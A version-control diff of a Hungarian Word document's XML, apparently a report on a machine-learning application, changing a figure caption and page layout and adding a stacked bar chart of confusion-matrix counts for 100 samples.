-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <mc:AlternateContent>
-          <mc:Choice Requires="wps">
-            <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F30B83E" wp14:editId="4DB24774">
-                <wp:simplePos x="0" y="0"/>
-                <wp:positionH relativeFrom="column">
-                  <wp:posOffset>4103370</wp:posOffset>
-                </wp:positionH>
-                <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>1511300</wp:posOffset>
-                </wp:positionV>
-                <wp:extent cx="377825" cy="219075"/>
-                <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:wrapNone/>
-                <wp:docPr id="11" name="Szövegdoboz 2"/>
-                <wp:cNvGraphicFramePr>
-                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
-                </wp:cNvGraphicFramePr>
-                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
-                    <wps:wsp>
-                      <wps:cNvSpPr txBox="1">
-                        <a:spLocks noChangeArrowheads="1"/>
-                      </wps:cNvSpPr>
-                      <wps:spPr bwMode="auto">
-                        <a:xfrm>
-                          <a:off x="0" y="0"/>
-                          <a:ext cx="377825" cy="219075"/>
-                        </a:xfrm>
-                        <a:prstGeom prst="rect">
-                          <a:avLst/>
-                        </a:prstGeom>
-                        <a:noFill/>
-                        <a:ln w="9525">
-                          <a:noFill/>
-                          <a:miter lim="800000"/>
-                          <a:headEnd/>
-                          <a:tailEnd/>
-                        </a:ln>
-                      </wps:spPr>
-                      <wps:txbx>
-                        <w:txbxContent>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                                <w:sz w:val="14"/>
-                                <w:szCs w:val="14"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                                <w:sz w:val="14"/>
-                                <w:szCs w:val="14"/>
-                              </w:rPr>
-                              <w:t>…</w:t>
-                            </w:r>
-                          </w:p>
-                        </w:txbxContent>
-                      </wps:txbx>
-                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
-                        <a:noAutofit/>
-                      </wps:bodyPr>
-                    </wps:wsp>
-                  </a:graphicData>
-                </a:graphic>
-                <wp14:sizeRelH relativeFrom="margin">
-                  <wp14:pctWidth>0</wp14:pctWidth>
-                </wp14:sizeRelH>
-                <wp14:sizeRelV relativeFrom="margin">
-                  <wp14:pctHeight>0</wp14:pctHeight>
-                </wp14:sizeRelV>
-              </wp:anchor>
-            </w:drawing>
-          </mc:Choice>
-          <mc:Fallback>
-            <w:pict>
-              <v:shapetype w14:anchorId="2F30B83E" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
-                <v:stroke joinstyle="miter"/>
-                <v:path gradientshapeok="t" o:connecttype="rect"/>
-              </v:shapetype>
-              <v:shape id="Szövegdoboz 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:323.1pt;margin-top:119pt;width:29.75pt;height:17.25pt;z-index:251661312;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
-                <v:textbox>
-                  <w:txbxContent>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                          <w:sz w:val="14"/>
-                          <w:szCs w:val="14"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                          <w:sz w:val="14"/>
-                          <w:szCs w:val="14"/>
-                        </w:rPr>
-                        <w:t>…</w:t>
-                      </w:r>
-                    </w:p>
-                  </w:txbxContent>
-                </v:textbox>
-              </v:shape>
-            </w:pict>
-          </mc:Fallback>
-        </mc:AlternateContent>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <mc:AlternateContent>
-          <mc:Choice Requires="wps">
-            <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EF013A1" wp14:editId="3A75825B">
-                <wp:simplePos x="0" y="0"/>
-                <wp:positionH relativeFrom="column">
-                  <wp:posOffset>2795270</wp:posOffset>
-                </wp:positionH>
-                <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>1416050</wp:posOffset>
-                </wp:positionV>
-                <wp:extent cx="377825" cy="219075"/>
-                <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                <wp:wrapNone/>
-                <wp:docPr id="217" name="Szövegdoboz 2"/>
-                <wp:cNvGraphicFramePr>
-                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
-                </wp:cNvGraphicFramePr>
-                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
-                    <wps:wsp>
-                      <wps:cNvSpPr txBox="1">
-                        <a:spLocks noChangeArrowheads="1"/>
-                      </wps:cNvSpPr>
-                      <wps:spPr bwMode="auto">
-                        <a:xfrm>
-                          <a:off x="0" y="0"/>
-                          <a:ext cx="377825" cy="219075"/>
-                        </a:xfrm>
-                        <a:prstGeom prst="rect">
-                          <a:avLst/>
-                        </a:prstGeom>
-                        <a:noFill/>
-                        <a:ln w="9525">
-                          <a:noFill/>
-                          <a:miter lim="800000"/>
-                          <a:headEnd/>
-                          <a:tailEnd/>
-                        </a:ln>
-                      </wps:spPr>
-                      <wps:txbx>
-                        <w:txbxContent>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                                <w:sz w:val="14"/>
-                                <w:szCs w:val="14"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                                <w:sz w:val="14"/>
-                                <w:szCs w:val="14"/>
-                              </w:rPr>
-                              <w:t>…</w:t>
-                            </w:r>
-                          </w:p>
-                        </w:txbxContent>
-                      </wps:txbx>
-                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
-                        <a:noAutofit/>
-                      </wps:bodyPr>
-                    </wps:wsp>
-                  </a:graphicData>
-                </a:graphic>
-                <wp14:sizeRelH relativeFrom="margin">
-                  <wp14:pctWidth>0</wp14:pctWidth>
-                </wp14:sizeRelH>
-                <wp14:sizeRelV relativeFrom="margin">
-                  <wp14:pctHeight>0</wp14:pctHeight>
-                </wp14:sizeRelV>
-              </wp:anchor>
-            </w:drawing>
-          </mc:Choice>
-          <mc:Fallback>
-            <w:pict>
-              <v:shape w14:anchorId="3EF013A1" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:220.1pt;margin-top:111.5pt;width:29.75pt;height:17.25pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
-                <v:textbox>
-                  <w:txbxContent>
-                    <w:p>
-                      <w:pPr>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                          <w:sz w:val="14"/>
-                          <w:szCs w:val="14"/>
-                        </w:rPr>
-                      </w:pPr>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                          <w:sz w:val="14"/>
-                          <w:szCs w:val="14"/>
-                        </w:rPr>
-                        <w:t>…</w:t>
-                      </w:r>
-                    </w:p>
-                  </w:txbxContent>
-                </v:textbox>
-              </v:shape>
-            </w:pict>
-          </mc:Fallback>
-        </mc:AlternateContent>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28834D53" wp14:editId="224264A5">
-            <wp:extent cx="8891270" cy="2169160"/>
-            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
-            <wp:docPr id="5" name="Kép 5"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="5" name="Kép 5"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId24">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="8891270" cy="2169160"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.1-es ábra: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">machine_learning_app, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a program fő mappájának felépítése</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> TODO</w:t>
+        <w:t>TOD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>O</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
+      <w:headerReference w:type="default" r:id="rId23"/>
+      <w:footerReference w:type="default" r:id="rId24"/>
+      <w:headerReference w:type="first" r:id="rId25"/>
+      <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
       <w:cols w:space="708"/>
       <w:titlePg/>
@@ -24981,6 +24845,2371 @@
 </w:styles>
 </file>
 
+<file path=word/charts/chart1.xml><?xml version="1.0" encoding="utf-8"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
+  <c:date1904 val="0"/>
+  <c:lang val="hu-HU"/>
+  <c:roundedCorners val="0"/>
+  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
+    <mc:Choice xmlns:c14="http://schemas.microsoft.com/office/drawing/2007/8/2/chart" Requires="c14">
+      <c14:style val="103"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <c:style val="3"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
+  <c:clrMapOvr bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
+  <c:chart>
+    <c:title>
+      <c:tx>
+        <c:rich>
+          <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:defRPr sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1">
+                    <a:lumMod val="50000"/>
+                    <a:lumOff val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mj-lt"/>
+                <a:ea typeface="+mj-ea"/>
+                <a:cs typeface="+mj-cs"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US"/>
+              <a:t>Confusion matrix for 100 samples</a:t>
+            </a:r>
+          </a:p>
+        </c:rich>
+      </c:tx>
+      <c:overlay val="0"/>
+      <c:spPr>
+        <a:noFill/>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </c:spPr>
+      <c:txPr>
+        <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+        <a:lstStyle/>
+        <a:p>
+          <a:pPr>
+            <a:defRPr sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="50000"/>
+                  <a:lumOff val="50000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:latin typeface="+mj-lt"/>
+              <a:ea typeface="+mj-ea"/>
+              <a:cs typeface="+mj-cs"/>
+            </a:defRPr>
+          </a:pPr>
+          <a:endParaRPr lang="hu-HU"/>
+        </a:p>
+      </c:txPr>
+    </c:title>
+    <c:autoTitleDeleted val="0"/>
+    <c:plotArea>
+      <c:layout/>
+      <c:barChart>
+        <c:barDir val="col"/>
+        <c:grouping val="stacked"/>
+        <c:varyColors val="0"/>
+        <c:ser>
+          <c:idx val="0"/>
+          <c:order val="0"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$B$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>TP</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="75000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$B$3:$B$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>47</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>47</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>41</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>48</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>46</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>47</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>36</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>0</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000000-1275-4DFC-BB4A-A46C0B2DDE09}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:ser>
+          <c:idx val="1"/>
+          <c:order val="1"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$C$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>TN</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="40000"/>
+                <a:lumOff val="60000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$C$3:$C$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>6</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>48</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>49</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>12</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>48</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000001-1275-4DFC-BB4A-A46C0B2DDE09}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:ser>
+          <c:idx val="2"/>
+          <c:order val="2"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$D$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>FP</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="20000"/>
+                <a:lumOff val="80000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$D$3:$D$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>48</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>48</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>37</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>47</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>49</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>48</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>8</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>0</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000002-1275-4DFC-BB4A-A46C0B2DDE09}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:ser>
+          <c:idx val="3"/>
+          <c:order val="3"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$E$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>FN</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="60000"/>
+                <a:lumOff val="40000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$E$3:$E$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>11</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>47</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>46</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>0</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>39</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>47</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000003-1275-4DFC-BB4A-A46C0B2DDE09}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:dLbls>
+          <c:showLegendKey val="0"/>
+          <c:showVal val="0"/>
+          <c:showCatName val="0"/>
+          <c:showSerName val="0"/>
+          <c:showPercent val="0"/>
+          <c:showBubbleSize val="0"/>
+        </c:dLbls>
+        <c:gapWidth val="150"/>
+        <c:overlap val="100"/>
+        <c:axId val="15898064"/>
+        <c:axId val="15898480"/>
+      </c:barChart>
+      <c:catAx>
+        <c:axId val="15898064"/>
+        <c:scaling>
+          <c:orientation val="minMax"/>
+        </c:scaling>
+        <c:delete val="0"/>
+        <c:axPos val="b"/>
+        <c:majorGridlines>
+          <c:spPr>
+            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="15000"/>
+                  <a:lumOff val="85000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:round/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+        </c:majorGridlines>
+        <c:numFmt formatCode="General" sourceLinked="1"/>
+        <c:majorTickMark val="none"/>
+        <c:minorTickMark val="none"/>
+        <c:tickLblPos val="nextTo"/>
+        <c:spPr>
+          <a:noFill/>
+          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+            <a:solidFill>
+              <a:schemeClr val="dk1">
+                <a:lumMod val="15000"/>
+                <a:lumOff val="85000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:round/>
+          </a:ln>
+          <a:effectLst/>
+        </c:spPr>
+        <c:txPr>
+          <a:bodyPr rot="-60000000" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1">
+                    <a:lumMod val="65000"/>
+                    <a:lumOff val="35000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:endParaRPr lang="hu-HU"/>
+          </a:p>
+        </c:txPr>
+        <c:crossAx val="15898480"/>
+        <c:crosses val="autoZero"/>
+        <c:auto val="1"/>
+        <c:lblAlgn val="ctr"/>
+        <c:lblOffset val="100"/>
+        <c:noMultiLvlLbl val="0"/>
+      </c:catAx>
+      <c:valAx>
+        <c:axId val="15898480"/>
+        <c:scaling>
+          <c:orientation val="minMax"/>
+        </c:scaling>
+        <c:delete val="0"/>
+        <c:axPos val="l"/>
+        <c:majorGridlines>
+          <c:spPr>
+            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="15000"/>
+                  <a:lumOff val="85000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:round/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+        </c:majorGridlines>
+        <c:numFmt formatCode="General" sourceLinked="1"/>
+        <c:majorTickMark val="none"/>
+        <c:minorTickMark val="none"/>
+        <c:tickLblPos val="nextTo"/>
+        <c:spPr>
+          <a:noFill/>
+          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+            <a:solidFill>
+              <a:schemeClr val="dk1">
+                <a:lumMod val="15000"/>
+                <a:lumOff val="85000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:round/>
+          </a:ln>
+          <a:effectLst/>
+        </c:spPr>
+        <c:txPr>
+          <a:bodyPr rot="-60000000" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1">
+                    <a:lumMod val="65000"/>
+                    <a:lumOff val="35000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:endParaRPr lang="hu-HU"/>
+          </a:p>
+        </c:txPr>
+        <c:crossAx val="15898064"/>
+        <c:crosses val="autoZero"/>
+        <c:crossBetween val="between"/>
+      </c:valAx>
+      <c:spPr>
+        <a:pattFill prst="ltDnDiag">
+          <a:fgClr>
+            <a:schemeClr val="dk1">
+              <a:lumMod val="15000"/>
+              <a:lumOff val="85000"/>
+            </a:schemeClr>
+          </a:fgClr>
+          <a:bgClr>
+            <a:schemeClr val="lt1"/>
+          </a:bgClr>
+        </a:pattFill>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </c:spPr>
+    </c:plotArea>
+    <c:legend>
+      <c:legendPos val="b"/>
+      <c:overlay val="0"/>
+      <c:spPr>
+        <a:noFill/>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </c:spPr>
+      <c:txPr>
+        <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+        <a:lstStyle/>
+        <a:p>
+          <a:pPr>
+            <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="65000"/>
+                  <a:lumOff val="35000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:latin typeface="+mn-lt"/>
+              <a:ea typeface="+mn-ea"/>
+              <a:cs typeface="+mn-cs"/>
+            </a:defRPr>
+          </a:pPr>
+          <a:endParaRPr lang="hu-HU"/>
+        </a:p>
+      </c:txPr>
+    </c:legend>
+    <c:plotVisOnly val="1"/>
